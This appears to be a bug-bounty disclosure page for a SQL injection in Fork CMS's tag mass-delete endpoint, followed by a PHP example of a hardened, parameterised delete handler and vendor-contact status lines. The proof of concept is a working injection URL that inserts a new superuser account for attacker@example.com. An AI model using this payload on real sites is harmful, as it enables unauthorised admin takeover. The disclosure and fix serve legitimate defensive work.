SQL Injection in forkcms/forkcms
Valid
Reported on Oct 22nd 2021
Description
When calling the URL for deleting one or more tags, the parameter id is vulnerable to SQL injection.
Proof of Concept
Call a URL like this one (as an authenticated user):
http://forkcms.site/private/de/tags/mass_action?token=n93e05rj0l&id[]=3);insert into users(email,password,is_god) values ('attacker@example.com','$2y$10$qqJ9L1lIp38gKpqh1V3l1.EqLzj.brB0IqUPQ2XXcSjl6Dtcgq16C',1);--+&action=delete
After calling this URL, the table users has a new entry.
Impact
The attacker can tamper with data in the database as they want.
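A hardened form of the kind of delete handler described above, as an added example that is not Fork CMS code or part of the original report: each id[] value must validate as a positive integer and is then passed as a bound parameter instead of being concatenated into the SQL text. The function name deleteTagsByIds, the tags and users table layout and the in-memory SQLite database are assumptions made for the demo.

```php
<?php
declare(strict_types=1);

// Hypothetical helper (not Fork CMS code): delete tags by id with bound parameters.
function deleteTagsByIds(PDO $db, array $rawIds): int
{
    $ids = [];
    foreach ($rawIds as $raw) {
        // id[] can carry nested arrays or other types; accept scalars only.
        if (!is_string($raw) && !is_int($raw)) {
            throw new InvalidArgumentException('id must be a scalar integer');
        }
        // Accept only positive decimal integers; anything else is rejected.
        $value = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
        if ($value === false) {
            throw new InvalidArgumentException('id must be a positive integer');
        }
        $ids[] = $value;
    }
    if ($ids === []) {
        return 0;
    }
    // One "?" per id: the values travel separately from the SQL text.
    $placeholders = implode(',', array_fill(0, count($ids), '?'));
    $stmt = $db->prepare("DELETE FROM tags WHERE id IN ($placeholders)");
    $stmt->execute($ids);
    return $stmt->rowCount();
}

// Constructed demo data in an in-memory SQLite database (assumed schema).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE tags (id INTEGER PRIMARY KEY, tag TEXT)');
$db->exec('CREATE TABLE users (email TEXT, is_god INTEGER)');
$db->exec("INSERT INTO tags (id, tag) VALUES (1,'a'),(2,'b'),(3,'c')");

echo deleteTagsByIds($db, ['1', '2']), " rows deleted\n";

// Same shape as the id[] value in the report above (shortened, constructed).
$hostile = ["3);insert into users(email,is_god) values ('attacker@example.com',1);--"];
try {
    deleteTagsByIds($db, $hostile);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
echo $db->query('SELECT COUNT(*) FROM users')->fetchColumn(), " rows in users\n";
```

Rejecting the whole request on the first invalid id, rather than silently casting it, also leaves a clear signal in application logs when someone probes the parameter.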
We have contacted a member of the forkcms team and are waiting to hear back
7 months ago
We have sent a follow up to the forkcms team. We will try again in 7 days.
7 months ago
Jelmer Prins has been awarded the fix bounty